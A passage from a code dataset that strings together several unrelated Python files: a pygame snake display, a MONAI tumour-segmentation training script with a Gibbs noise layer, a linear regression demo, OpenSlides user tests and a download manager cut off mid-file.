neighbors)\n new_messages[(i, j)] = msg\n assert len(new_messages) == len(messages)\n messages = new_messages\n\n # compute marginals\n marginals = {}\n for i in node_potential:\n marginals[i] = {}\n msg = {0: 1, 1: 1}\n for j in neighbors[i]:\n msg[0] *= messages[(j, i)][0]\n msg[1] *= messages[(j, i)][1]\n marginals[i][0] = node_potential[i][0] * msg[0]\n marginals[i][1] = node_potential[i][1] * msg[1]\n\n # normalize marginals\n normalize_marginals(marginals)\n\n yield marginals\n","sub_path":"ps5/bp.py","file_name":"bp.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"245875285","text":"import pygame\n\nfrom src.frontend.text import Text\nimport constants as c\n\nclass Display():\n\n def __init__(self):\n pygame.init()\n self._screen = pygame.display.set_mode(((c.TILE_X+2)*c.TILE_SIZE,(c.TILE_Y+2)*c.TILE_SIZE))\n self._run = True\n self._EndGame = False\n self.PrepareWinTexts()\n self._winner = 0\n\n def PrepareWinTexts(self):\n screen_width = ((c.TILE_X+1)*c.TILE_SIZE)//2\n screen_height = ((c.TILE_Y+1)*c.TILE_SIZE)//2\n self._win_1 = Text(self._screen,screen_width,screen_height,\"Player 1 wins\")\n self._win_2 = Text(self._screen,screen_width,screen_height,\"Player 2 wins\")\n self._win_3 = Text(self._screen,screen_width,screen_height,\"Tie!\")\n\n def Update(self,objects):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self._run = False\n \n self.FillBackground()\n self.FillBorder()\n self.FillObjects(objects)\n self.VictoryText(self._winner)\n\n pygame.display.update()\n \n def VictoryText(self,winner):\n if winner == 1:\n self._win_1.Draw()\n elif winner == 2:\n self._win_2.Draw()\n elif winner == 3:\n self._win_3.Draw()\n \n def FillBackground(self):\n self._screen.fill(c.WHITE)\n\n def FillBorder(self):\n for i in range(c.TILE_X+2):\n for j in range(c.TILE_Y+2):\n if i == 0 or j == 0 or i == c.TILE_X+1 or j == c.TILE_Y+1:\n self.FillTile(i,j,c.BLACK)\n \n def FillTile(self,x,y,colour):\n pygame.draw.rect(self._screen,colour,(x*c.TILE_SIZE,y*c.TILE_SIZE,c.TILE_SIZE,c.TILE_SIZE))\n\n def FillObjects(self,objects):\n player_1 = objects[0].GetBody()\n player_2 = objects[1].GetBody()\n fruit = objects[2]\n\n for body in fruit:\n self.FillTile(body[0]+1,body[1]+1,c.BLUE)\n for body in player_1:\n self.FillTile(body[0]+1,body[1]+1,c.RED)\n for body in player_2:\n self.FillTile(body[0]+1,body[1]+1,c.GREEN)\n \n player_1_tag = Text(self._screen,(player_1[0][0]+1.5)*c.TILE_SIZE,(player_1[0][1]+1.55)*c.TILE_SIZE,\"1\")\n player_2_tag = Text(self._screen,(player_2[0][0]+1.5)*c.TILE_SIZE,(player_2[0][1]+1.55)*c.TILE_SIZE,\"2\")\n player_1_tag.Draw()\n player_2_tag.Draw()\n\n def Winner(self,winner):\n if winner:\n self._EndGame = True\n self._winner = winner\n\n def IsGameRun(self):\n return self._run","sub_path":"Snakes 2/src/frontend/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"588500024","text":"\"\"\"\nWrite a function which takes a string (day of week) and an integer (number to \nbe tested) and tests whether number matches rules below (return a boolean).\n\nMonday --> 12\nTuesday --> numbers greater than 95\nWednesday --> 34\nThursday --> 0\nFriday --> numbers divisable by 2\nSaturday --> 56\nSunday --> 666 or -666\n\n\"\"\"\n\ndef am_I_afraid(day,num):\n\n\n\t\"\"\"\n\t>>> am_I_afraid(\"Monday\", 13)\n\tFalse\n\t>>> am_I_afraid(\"Sunday\", -666)\n\tTrue\n\t>>> am_I_afraid(\"Tuesday\", 2)\n\tFalse\n\t>>> am_I_afraid(\"Tuesday\", 965)\n\tTrue\n\t>>> am_I_afraid(\"Friday\", 2)\n\tTrue\n\t\"\"\"\n\n\t\"\"\" \n\tthe dictionary approach, clarified after seeing solutions.\n\tdidn't know I could use dict like this, with rules \n\tbeing tested at return statement. very cool.\n\t\"\"\"\n\treturn {\n\t\"Monday\": num == 12,\n\t\"Tuesday\": num > 95,\n\t\"Wednesday\": num == 34,\n\t\"Thursday\": num == 0,\n\t\"Friday\": num % 2 == 0,\n\t\"Saturday\": num == 56,\n\t\"Sunday\": abs(num) == 666\n\t}[day]\n\n\nif __name__ == \"__main__\":\n\n\timport doctest\n\tdoctest.testmod()","sub_path":"cw/cw_7_selectiveFearOfNum.py","file_name":"cw_7_selectiveFearOfNum.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"250045332","text":"''' Written 4/12/2018 by Ross Hartley\n This program checks the log .csv file and returns the parameters for AC, AQ, and mcl_cluster\n'''\n\n# Helper function to turn csv values into numbers\ndef strClean(input):\n output = input\n i = 0\n # Iterate through each item in input and cast it as a float, removing brackets and such\n for str in input:\n output[i] = float(str[1:(len(str)-1)])\n i = i + 1\n return output\n\ndef get_params(csv_filepath):\n import csv\n import os\n\n # Store path to log file\n log_path = os.path.join(csv_filepath, \"hs_log.csv\")\n # Make variables for parameters\n ac_params = []\n aq_params = []\n cl_params = []\n with open(log_path, 'r') as hs_log:\n # Get data from log file\n reader = csv.reader(hs_log)\n data = list(reader)\n row_count = len(data)\n lastrow = row_count - 1\n # Store AC data in ac_params\n ac_params = data[lastrow][0:2]\n # ac_params = strClean(ac_params)\n # Store AQ data in aq_params\n aq_params = data[lastrow][2:7]\n # aq_params = strClean(aq_params)\n # Store Clustering data in cl_params\n cl_params = data[lastrow][7:11]\n # cl_params = strClean(cl_params)\n # Store status of AC, AQ, and CL\n ac_stat = data[lastrow][14:15]\n aq_stat = data[lastrow][15:16]\n cl_stat = data[lastrow][16:17]\n\n return ac_params, aq_params, cl_params, ac_stat, aq_stat, cl_stat\n","sub_path":"hotspotter/get_params.py","file_name":"get_params.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642749488","text":"################################################################\n# bit to help with torch/monai bug reported at # \n# https://github.com/Project-MONAI/MONAI/issues/701 #\nimport resource #\nrlimit = resource.getrlimit(resource.RLIMIT_NOFILE) #\nresource.setrlimit(resource.RLIMIT_NOFILE, (4096, rlimit[1])) #\n################################################################\n\nimport os\nimport shutil\nimport json\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom monai.config import print_config\nfrom monai.data import DataLoader, CacheDataset, partition_dataset\nfrom monai.losses import DiceLoss\nfrom monai.metrics import DiceMetric\nfrom monai.networks.nets import UNet\nfrom monai.transforms import (\n Activations,\n AddChanneld,\n AsDiscrete,\n CenterSpatialCropd,\n Compose,\n LoadImaged,\n MapTransform,\n NormalizeIntensityd,\n Orientationd,\n RandFlipd,\n RandScaleIntensityd,\n RandShiftIntensityd,\n RandSpatialCropd,\n Spacingd,\n ToTensord,\n)\nfrom monai.utils import set_determinism\n\nimport torch\nfrom torch.utils.data import ConcatDataset\nimport torch.nn as nn\n\n\nimport matplotlib.pyplot as plt\n\nfrom math import floor\n\nfrom typing import Union, List, Tuple\n\n#################################################################\n\n# Local imports\n\nSOURCE_CODE_PATH = '/homes/yc7620/Documents/medical-vision-textural-bias/source_code/'\n\nimport sys\nsys.path.append(SOURCE_CODE_PATH)\n\nfrom filters_and_operators import WholeTumorTCGA \nfrom utils import ReCompose\nfrom stylization_layers import GibbsNoiseLayer\n# set determinism for reproducibility\nset_determinism(seed=0)\n\nprint_config()\n\nroot_dir = '/vol/bitbucket/yc7620/90_data/53_TCGA_data/' \nprint('root_dir', root_dir)\n#################################################################\n# blurb\n\nprint('stylized network on four modalities. excluding one institution\\n')\n\n#################################################################\n# SCRIPT PARAMETERS \n\n\n# gibbs layer starting point\nalpha = 0.7\n\nJOB_NAME = f\"gibbs{alpha}_layer_GibbsGD_model_sourceDist_4mods_WT\"\nprint(f\"JOB_NAME = {JOB_NAME}\\n\")\n\n# create dir\n\nworking_dir = os.path.join(root_dir,JOB_NAME)\ntry:\n os.mkdir(working_dir)\nexcept:\n print('creating version _2 of working dir') \n JOB_NAME = JOB_NAME + '_2'\n working_dir = os.path.join(root_dir,JOB_NAME)\n os.mkdir(working_dir)\n#############################################################################\n\n\n# Preprocessing transforms. Note we use wrapping artifacts. \n\ntrain_transform = ReCompose(\n [\n LoadImaged(keys=[\"image\", \"label\"]),\n AddChanneld(keys=\"image\"),\n WholeTumorTCGA(keys=\"label\"),\n Spacingd(\n keys=[\"image\", \"label\"],\n pixdim=(1.5, 1.5, 2.0),\n mode=(\"bilinear\", \"nearest\")\n ),\n Orientationd(keys=[\"image\", \"label\"], axcodes=\"RAS\"),\n RandSpatialCropd(\n keys=[\"image\", \"label\"], roi_size=[128, 128, 64], random_size=False\n ),\n RandFlipd(keys=[\"image\", \"label\"], prob=0.5, spatial_axis=0),\n NormalizeIntensityd(keys=\"image\", nonzero=True, channel_wise=True),\n RandScaleIntensityd(\"image\", factors=0.1, prob=0.5),\n RandShiftIntensityd(\"image\", offsets=0.1, prob=0.5),\n ToTensord(keys=[\"image\", \"label\"]),\n ]\n)\n\nval_transform = ReCompose(\n [\n LoadImaged(keys=[\"image\", \"label\"]),\n AddChanneld(keys=\"image\"),\n WholeTumorTCGA(keys=\"label\"),\n Spacingd(\n keys=[\"image\", \"label\"],\n pixdim=(1.5, 1.5, 2.0),\n mode=(\"bilinear\", \"nearest\"),\n ),\n Orientationd(keys=[\"image\", \"label\"], axcodes=\"RAS\"),\n CenterSpatialCropd(keys=[\"image\", \"label\"], roi_size=[128, 128, 64]),\n NormalizeIntensityd(keys=\"image\", nonzero=True, channel_wise=True),\n ToTensord(keys=[\"image\", \"label\"]),\n ]\n)\n\n\nprint('\\n')\nprint('training transforms: ', train_transform.transforms,'\\n')\nprint('validation transforms: ', val_transform.transforms, '\\n')\n###########################################################################\n\n# Dataloading\n\n# load data dictionaries\nwith open(os.path.join(root_dir, 'train_sequence_by_modality.json'), 'r') as f:\n data_seqs_4mods = json.load(f)\n\n# split off training and validation \ntrain_seq_flair, val_seq_flair = partition_dataset(data_seqs_4mods[\"FLAIR\"], [0.9, 0.1], shuffle=True, seed=0)\ntrain_seq_t1, val_seq_t1 = partition_dataset(data_seqs_4mods[\"T1\"], [0.9, 0.1], shuffle=True, seed=0)\ntrain_seq_t1gd, val_seq_t1gd = partition_dataset(data_seqs_4mods[\"T1Gd\"], [0.9, 0.1], shuffle=True, seed=0)\ntrain_seq_t2, val_seq_t2 = partition_dataset(data_seqs_4mods[\"T2\"], [0.9, 0.1], shuffle=True, seed=0)\n# create datasets\n\ntrain_ds_flair = CacheDataset(train_seq_flair, train_transform, cache_num=100)\ntrain_ds_t1 = CacheDataset(train_seq_t1, train_transform, cache_num=100)\ntrain_ds_t1gd = CacheDataset(train_seq_t1gd, train_transform, cache_num=100)\ntrain_ds_t2 = CacheDataset(train_seq_t2, train_transform, cache_num=100)\n\nval_ds_flair = CacheDataset(val_seq_flair, val_transform, cache_num=50)\nval_ds_t1 = CacheDataset(val_seq_t1, val_transform, cache_num=50)\nval_ds_t1gd = CacheDataset(val_seq_t1gd, val_transform, cache_num=50)\nval_ds_t2 = CacheDataset(val_seq_t2, val_transform, cache_num=50)\n\nval_ds = ConcatDataset([val_ds_flair, val_ds_t1, val_ds_t1gd, val_ds_t2])\ntrain_ds = ConcatDataset([train_ds_flair, train_ds_t1, train_ds_t1gd, train_ds_t2])\n\n# dataloaders\ntrain_loader = DataLoader(train_ds, batch_size=2, shuffle=True, num_workers=4)\nval_loader = DataLoader(val_ds, batch_size=2, shuffle=False, num_workers=4)\n\nprint('Data loaders created.\\n')\n\nprint('Data loaders created.\\n')\n############################################################################\n\n# Create model, loss, optimizer\n\nclass Gibbs_UNet(nn.Module):\n \"\"\"ResUnet with Gibbs layer\"\"\"\n \n def __init__(self, alpha=None):\n super().__init__()\n \n self.gibbs = GibbsNoiseLayer(alpha)\n \n self.ResUnet = UNet(\n dimensions=3,\n in_channels=1,\n out_channels=1,\n channels=(16, 32, 64, 128, 256),\n strides=(2, 2, 2, 2),\n num_res_units=2,\n )\n \n def forward(self,img):\n img = self.gibbs(img) \n img = self.ResUnet(img)\n return img\n \ndevice = torch.device(\"cuda:0\")\n\nmodel = Gibbs_UNet(alpha).to(device)\n\n# load trained baseline ResUnet\n# baseline_path = '/vol/bitbucket/yc7620/90_data/52_MONAI_DATA_DIRECTORY/10_training_results/imperial_project_data/baseline_model_sourceDist_4mods_WT/baseline_model_sourceDist_4mods_WT.pth'\n\n# model.ResUnet.load_state_dict(torch.load(baseline_path))\n\nloss_function = DiceLoss(to_onehot_y=False, sigmoid=True, squared_pred=True)\n\noptimizer = torch.optim.Adam(\n model.parameters(), 1e-4, weight_decay=1e-5, amsgrad=True)\n\n\n###########################################################################\n\n# freeze Unet\n# for param in model.ResUnet.parameters():\n# param.requires_grad = False\n \nprint('Model instatitated with number of parameters = ',\n sum([p.numel() for p in model.parameters() if p.requires_grad]))\n\n############################################################################\n\n# Training loop\n\nmax_epochs = 110\nval_interval = 2\nbest_metric = -1\nbest_metric_epoch = -1\nepoch_loss_values = []\nmetric_values = []\ngibbs_values = [] # store the Gibbs trajectory\n\nprint('\\n Training started... \\n')\n\n@torch.no_grad()\ndef Gibbs_GD(inputs, labels, model, h = 0.01, learning_rate = 0.02):\n \"\"\"Function to update Gibbs layer via finite different SG\"\"\"\n# with torch.no_grad():\n old_alpha = model.gibbs.alpha.clone()\n # loss at alpha\n outputs_0 = model(inputs)\n loss_0 = loss_function(outputs_0, labels)\n # loss at perturbed alpha\n model.gibbs.alpha = old_alpha + h\n outputs_h = model(inputs)\n loss_h = loss_function(outputs_h, labels)\n # approximate gradient\n delta = (loss_h - loss_0) / h\n # update alpha and model\n model.gibbs.alpha = old_alpha - learning_rate * delta\n \n return loss_0.detach().item(), model.gibbs.alpha.item()\n \n\nfor epoch in range(max_epochs):\n print(\"-\" * 10)\n print(f\"epoch {epoch + 1}/{max_epochs}\")\n model.train()\n epoch_loss = 0\n gibbs_loss_epoch = 0\n step = 0\n for batch_data in train_loader:\n #save gibbs trajectory\n gibbs_values.append(model.gibbs.alpha.detach().item())\n \n step += 1\n inputs, labels = (\n batch_data[\"image\"].to(device),\n batch_data[\"label\"].to(device),\n )\n # update the Unet\n optimizer.zero_grad()\n outputs = model(inputs)\n loss = loss_function(outputs, labels)\n loss.backward()\n optimizer.step()\n epoch_loss += loss.item()\n \n # update Gibbs\n gibbs_loss, gibbs_alpha = Gibbs_GD(inputs, labels, model)\n gibbs_values.append(gibbs_alpha)\n # gibbs_loss_epoch += gibbs_loss\n \n\n epoch_loss /= step\n # gibbs_loss_epoch /= step\n epoch_loss_values.append(epoch_loss)\n # epoch_loss_values.append(gibbs_loss_epoch) # TODO: use this line with frozen Unet only\n print(f\"epoch {epoch + 1} average loss: {epoch_loss:.4f}\")\n \n # test on validation\n if (epoch + 1) % val_interval == 0:\n model.eval()\n with torch.no_grad():\n dice_metric = DiceMetric(include_background=True, reduction=\"mean\")\n post_trans = Compose(\n [Activations(sigmoid=True), AsDiscrete(threshold_values=True)]\n )\n metric_sum = 0.0\n metric_count = 0\n for val_data in val_loader:\n val_inputs, val_labels = (\n val_data[\"image\"].to(device),\n val_data[\"label\"].to(device),\n )\n val_outputs = model(val_inputs)\n val_outputs = post_trans(val_outputs)\n # compute overall mean dice\n value, not_nans = dice_metric(y_pred=val_outputs, y=val_labels)\n not_nans = not_nans.item()\n metric_count += not_nans\n metric_sum += value.item() * not_nans\n\n metric = metric_sum / metric_count\n metric_values.append(metric)\n\n if metric > best_metric:\n best_metric = metric\n best_metric_epoch = epoch + 1\n torch.save(\n model.state_dict(),\n os.path.join(working_dir, JOB_NAME + '.pth'),\n )\n print(\"saved new best metric model\")\n print(\n f\"current epoch: {epoch + 1} current mean dice: {metric:.4f}\"\n f\"\\nbest mean dice: {best_metric:.4f}\"\n f\" at epoch: {best_metric_epoch}\"\n )\n\n# print best metric and epoch\nprint(\n f\"train completed, best_metric: {best_metric:.4f}\"\n f\" at epoch: {best_metric_epoch}\"\n)\n\n############################################################################\n\n# Save learning curves\n\nprint('Plotting learning curves')\n\nplt.figure(\"train\", (12, 6))\nplt.subplot(1, 2, 1)\nplt.title(\"Epoch average Loss\")\nx = [i + 1 for i in range(len(epoch_loss_values))]\ny = epoch_loss_values\nplt.xlabel(\"epoch\")\nplt.plot(x, y, color=\"red\")\nplt.subplot(1, 2, 2)\nplt.title(\"Val mean Dice\")\nx = [val_interval * (i + 1) for i in range(len(metric_values))]\ny = metric_values\nplt.xlabel(\"epoch\")\nplt.plot(x, y, color=\"green\")\nplt.savefig(os.path.join(root_dir, f'trainLoss_and_meanValScore_{JOB_NAME}.png'))\nplt.show()\n\n\n\n###########################################################################\n\n# save training information\n\nprint('Saving epoch_loss_values and metrics')\n\nnp.savetxt(os.path.join(working_dir, f'epoch_loss_values_{JOB_NAME}.txt'), np.array(epoch_loss_values))\nnp.savetxt(os.path.join(working_dir, f'metric_values_{JOB_NAME}.txt'), np.array(metric_values))\nnp.savetxt(os.path.join(working_dir, f'gibbs_trajectory_{JOB_NAME}.txt'), np.array(gibbs_values))\n############################################################################\n\nprint('script ran fully')\n","sub_path":"10_scripts/300_instutional_distribution/350_stylized_layers/gibbs0p7_layer_domain_GD_inDist.py","file_name":"gibbs0p7_layer_domain_GD_inDist.py","file_ext":"py","file_size_in_byte":12227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"80598964","text":"# -*- coding:utf-8 -*-\n# 作者 :JunFengG\n# 创建时间 :2018/9/29 0029 11:14 \n# 文件 : regression\n\nimport numpy as np\nfrom sklearn import linear_model\nimport sklearn.metrics as sm\nimport matplotlib.pyplot as plt\n\nfilename='data_singlevar.txt'\nx=[]\ny=[]\nwith open(filename,'r') as f:\n for line in f.readlines():\n xt,yt=[float(i) for i in line.split(',')]\n x.append(xt)\n y.append(yt)\n\nnum_training=int(0.8*len(x))\nnum_test=len(x)-num_training\n\n#训练数据\nx_train=np.array(x[:num_training]).reshape((num_training,1))\ny_train=np.array(y[:num_training])\n\n#测试数据\nx_test=np.array(x[num_training:]).reshape((num_test,1))\ny_test=np.array(y[num_training:])\n\n#构造回归对象\nliner_regressor=linear_model.LinearRegression()\n\n# 训练集训练模型\nliner_regressor.fit(x_train,y_train)\n\n#训练集\ny_train_pred=liner_regressor.predict(x_train)\nplt.figure()\nplt.scatter(x_train, y_train, color='green')\nplt.plot(x_train, y_train_pred, linewidth='4', color='coral')\nplt.show()\n\n# 测试集\ny_test_pred=liner_regressor.predict(x_test)\nplt.scatter(x_test, y_test, color='green')\nplt.plot(x_test, y_test_pred, linewidth='4', color='coral')\nplt.show()\n\n\nprint('mse=',round(sm.mean_squared_error(y_test,y_test_pred),2))\nprint('mae=',round(sm.mean_absolute_error(y_test,y_test_pred),2))\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PythonMechineLearningCookbook/Chapter01/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"613137776","text":"from tests.system.action.base import BaseActionTestCase\n\n\nclass UserUpdateSelfActionTest(BaseActionTestCase):\n def test_update_correct(self) -> None:\n self.update_model(\n \"user/1\",\n {\"username\": \"username_srtgb123\"},\n )\n response = self.request(\n \"user.update_self\",\n {\n \"username\": \"username_Xcdfgee\",\n \"email\": \"email1@example.com\",\n },\n )\n self.assert_status_code(response, 200)\n model = self.get_model(\"user/1\")\n assert model.get(\"username\") == \"username_Xcdfgee\"\n assert model.get(\"email\") == \"email1@example.com\"\n\n def test_username_already_given(self) -> None:\n self.create_model(\"user/222\", {\"username\": \"user\"})\n response = self.request(\"user.update_self\", {\"username\": \"user\"})\n self.assert_status_code(response, 400)\n assert (\n response.json[\"message\"] == \"A user with the username user already exists.\"\n )\n\n def test_update_self_anonymus(self) -> None:\n response = self.request(\n \"user.update_self\",\n {\"email\": \"user@openslides.org\"},\n anonymous=True,\n )\n self.assert_status_code(response, 403)\n self.assertIn(\n \"Anonymous is not allowed to execute user.update_self\",\n response.json[\"message\"],\n )\n\n def test_update_self_about_me(self) -> None:\n self.create_meeting()\n self.user_id = self.create_user(\"test\", group_ids=[1])\n self.login(self.user_id)\n self.update_model(\"user/2\", {\"meeting_ids\": [1]})\n response = self.request(\n \"user.update_self\",\n {\n \"about_me_$\": {\n \"1\": \"This is for meeting/1\",\n }\n },\n )\n self.assert_status_code(response, 200)\n self.assert_model_exists(\"user/2\", {\"about_me_$1\": \"This is for meeting/1\"})\n\n def test_update_self_about_me_wrong_meeting(self) -> None:\n self.create_meeting()\n self.user_id = self.create_user(\"test\", group_ids=[1])\n self.login(self.user_id)\n self.set_models(\n {\n \"user/2\": {\"meeting_ids\": [1]},\n \"meeting/2\": {\"is_active_in_organization_id\": 1},\n }\n )\n response = self.request(\n \"user.update_self\",\n {\n \"about_me_$\": {\n \"1\": \"This is for meeting/1\",\n \"2\": \"This is for meeting/2\",\n }\n },\n )\n self.assert_status_code(response, 400)\n self.assertIn(\n \"User may update about_me_$ only in his meetings, but tries in [2]\",\n response.json[\"message\"],\n )\n\n def test_update_self_forbidden_username(self) -> None:\n self.update_model(\n \"user/1\",\n {\"username\": \"username_srtgb123\"},\n )\n response = self.request(\n \"user.update_self\",\n {\n \"username\": \" \",\n },\n )\n self.assert_status_code(response, 400)\n model = self.get_model(\"user/1\")\n assert model.get(\"username\") == \"username_srtgb123\"\n assert \"This username is forbidden.\" in response.json[\"message\"]\n","sub_path":"tests/system/action/user/test_update_self.py","file_name":"test_update_self.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"194191987","text":"# -*- coding: UTF-8 -*-\nfrom .struct.task import TaskManager, TasksManagerForWorkers\nfrom .struct.queue import TaskQueue\nfrom ..utils.eventdriven import ControllerPool, Controller, Subprocess, EventPending, Timer\nfrom ._manager import (EVT_MANAGER_WORKER_SPEED_LIMIT, EVT_MANAGER_WORKER_PAUSE)\nfrom nbdler.event import EVT_MANAGER_START\nfrom ._manager import manager_model, workers_model\nfrom ..utils.misc import Component\nfrom ..error import ManagerError\nfrom threading import Lock\nfrom queue import Queue\n\n\nclass ManagerConfigure(Component):\n \"\"\" 下载池管理器的配置信息。\"\"\"\n HEARTBEAT_INTERVAL = 0.5\n\n def __init__(self, maxsize, daemon=True, subprocess=False, max_speed=None, max_buff=None,\n heartbeat_interval=HEARTBEAT_INTERVAL):\n \"\"\"\n :param\n maxsize: 最大同时下载任务数量。\n daemon: 线程daemon参数。\n subprocess: 是否子进程模式下运行。\n max_speed: 最大速度限制。\n max_buff: 最大内存缓冲大小。若为None则由各自下载任务单独处理。\n heartbeat_interval: 心跳刷新间隔。\n \"\"\"\n self.maxsize = maxsize\n self.daemon = daemon\n self.subprocess = subprocess\n self.max_speed = max_speed\n self.max_buff = max_buff\n self.heartbeat_interval = heartbeat_interval\n\n def __snapshot__(self):\n return {\n 'maxsize': self.maxsize,\n 'daemon': self.daemon,\n 'subprocess': self.daemon,\n 'max_speed': self.max_speed,\n 'max_buff': self.max_buff,\n 'heartbeat_interval': self.heartbeat_interval\n }\n\n\nclass Manager(Component):\n def __init__(self, maxsize, **configure):\n assert maxsize > 0\n self._subprocess = None\n # 下载池管理器配置信息\n self.configure = ManagerConfigure(maxsize, **configure)\n # 任务ID队列\n self.__queue = TaskQueue()\n # 实时运行中的任务ID队列\n self.working = []\n # 下载任务管理器,集合下载对象信息的获取方法\n task_mgr_for_workers = TasksManagerForWorkers()\n # 初始化控制台和工作控制器。\n con_worker = Controller(mapping=manager_model, static={\n 'mgr': self, 'cfg': self.configure, 'queue': self.__queue, 'working': self.working\n }, daemon=self.configure.daemon, name='manager-%s' % maxsize)\n # 时钟发生器适配器用来实现限速的信号量处理问题。\n con_worker.Adapter(Timer())\n workers_static = {\n '_is_subprocess': self.configure.subprocess, 'task_mgr': task_mgr_for_workers,\n }\n if self.configure.subprocess:\n # 为了确保多余的空闲工作线程,多创建一个工作线程。\n con_worker.Adapter(Subprocess(maxsize=maxsize+1, mapping=workers_model, static=workers_static))\n # 子进程模式下使用了子进程插件Subprocess使得控制台在子进程下具有控制器池。\n # 所以控制台控制器也属于工作控制器。\n workers = con_worker\n self._subprocess = con_worker.adapters['subprocess']\n # 将父进程的下载任务替换成虚拟实例。\n task_mgr_for_workers = self._subprocess['task_mgr']\n else:\n # 统一与子进程模式下调用的行为,添加适配器EventPending\n con_worker.Adapter(EventPending())\n # 在非子进程模式下,工作控制器和控制台控制器是分开的,所以为了在工作控制器方便使用,将其引入静态上下文。\n workers_static['con_worker'] = con_worker\n workers = ControllerPool(maxsize, workers_model, static=workers_static, daemon=self.configure.daemon)\n\n self.workers = workers\n # 控制台引入工作控制器的对象。\n con_worker.__static__['workers'] = self.workers\n self.con_worker = con_worker\n task_mgr_for_workers = TaskManager(task_mgr_for_workers, self.configure.subprocess, self.__queue)\n self._task_mgr = task_mgr_for_workers\n\n # 异常错误队列\n self.__raise = Queue()\n self.__trap_lock = Lock()\n self.__paused = False\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n @property\n def body(self):\n \"\"\" 返回正在运行队列的任务的实体信息。\"\"\"\n return self._task_mgr.running_tasks.body\n\n info = body\n\n def __getitem__(self, item):\n if item == -1:\n return self._task_mgr.running_tasks\n elif item == -2:\n return self._task_mgr.all_tasks\n if item is not None and type(item) not in (tuple, list):\n # 列表化,方便后续统一的处理。\n item = (item,)\n return self._task_mgr.get_tasks(item)\n\n @property\n def queue(self):\n \"\"\" 返回下载任务队列消息。\"\"\"\n return self.__queue\n\n def is_paused(self):\n \"\"\" 返回管理器是否被暂停。\"\"\"\n return self.__paused\n\n def is_alive(self):\n \"\"\" 返回管理器是否在运行中。\"\"\"\n return self.con_worker.is_alive()\n\n def putrequest(self, request, enqueue=True):\n \"\"\" 添加下载任务请求到待下载队列。\n 返回任务ID号,用于接下来对其进行操作。\n \"\"\"\n tid = self.__queue.push(request)\n if enqueue:\n self.__queue.enqueue(tid)\n return tid\n\n def is_finished(self):\n \"\"\" 返回所有下载任务是否已结束。\"\"\"\n return not self.__paused and self.__queue.is_closed()\n\n def remaining_time(self):\n \"\"\" 返回运行中的总的估计剩余下载时间。\"\"\"\n return self._task_mgr.running_tasks.remaining_time()\n\n def remaining_length(self):\n \"\"\" 返回运行中的总的剩余下载字节数。\"\"\"\n return self._task_mgr.running_tasks.remaining_length()\n\n def realtime_speed(self):\n \"\"\" 返回运行中的总实时下载速度。\"\"\"\n return self._task_mgr.running_tasks.realtime_speed()\n\n def average_speed(self):\n \"\"\" 返回运行中的总平均下载速度。\"\"\"\n return self._task_mgr.running_tasks.average_speed()\n\n def increment_go(self):\n \"\"\" 返��运行中的总下载字节长度。\"\"\"\n return self._task_mgr.running_tasks.increment_go()\n\n def increment_done(self):\n \"\"\" 返回运行中的总写入文件的字节长度。\"\"\"\n return self._task_mgr.running_tasks.increment_done()\n\n def wait(self, timeout=None):\n \"\"\" 等待入列的任务处理完毕。并且等待下载池管理器控制器处于空闲状态。\"\"\"\n # 等待队列全部处理完成后\n self.__queue.join(timeout)\n # 控制器事件处理完毕并且处于空闲状态。\n self.con_worker.pending()\n self.con_worker.wait_for_idle()\n self.workers.pending()\n self.workers.wait_for_idle()\n\n join = wait\n\n def _raise_exception(self, error):\n \"\"\" 异常错误推送。\"\"\"\n if error is None:\n # 如果进入了trap方法的锁才进行推送None以通知释放锁。\n if not self.__trap_lock.locked():\n return\n self.__raise.put(error)\n\n def trap(self, timeout=None):\n \"\"\" 下载异常捕获等待。注意这应该只让其中一个线程处理,否则其他线程会出现阻塞的问题。\"\"\"\n with self.__trap_lock:\n if not self.con_worker.is_alive():\n return\n while True:\n data = self.__raise.get(timeout=timeout)\n # 如果异常信息是None说明是控制台停止所抛出的消息。\n if data is None:\n break\n tid, exception = data\n\n raise ManagerError(exception, tid)\n\n def start(self):\n \"\"\" 开始/继续下载池管理器,之后将会按照待下载队列以最大下载任务数顺序进行下载。 \"\"\"\n if self.con_worker.is_alive():\n self.__paused = False\n # 恢复队列的挂起。\n self.__queue.start()\n # 下载池管理器已经启动的前提下尝试运行队列的任务。\n self.con_worker.dispatch(EVT_MANAGER_START)\n self.con_worker.adapters['timer'].resume()\n else:\n # 准备任务队列\n self.__queue.start()\n # 启动控制台线程。\n self.con_worker.run()\n # 子进程模式下由于工作线程处于控制台的控制下,所以这时候不需要手动启动工作线程。\n if not self._subprocess:\n self.workers.run()\n self._task_mgr.start()\n # 等待工作控制器数据准备就绪。\n self.con_worker.dispatch(EVT_MANAGER_START).pending()\n self.con_worker.adapters['timer'].set_timing(self.configure.heartbeat_interval)\n\n def pause(self, block=True):\n \"\"\" 停止下载池管理器。\"\"\"\n self.__paused = True\n self.workers.dispatch(EVT_MANAGER_WORKER_PAUSE, self.__queue.running)\n if block:\n self.join()\n\n def close(self):\n \"\"\" 关闭下载池管理器。\"\"\"\n assert self.is_alive()\n # 关闭队列,任务管理器,再关闭控制台和工作线程,\n # 避免子进程模式下关闭后继续请求子进程获取下载信息而发生错误。\n self.__queue.close()\n # 关闭任务管理器\n self._task_mgr.close()\n # 关闭控制台线程\n self.con_worker.shutdown()\n if not self._subprocess:\n self.workers.shutdown()\n self.con_worker.wait()\n self.workers.wait()\n # 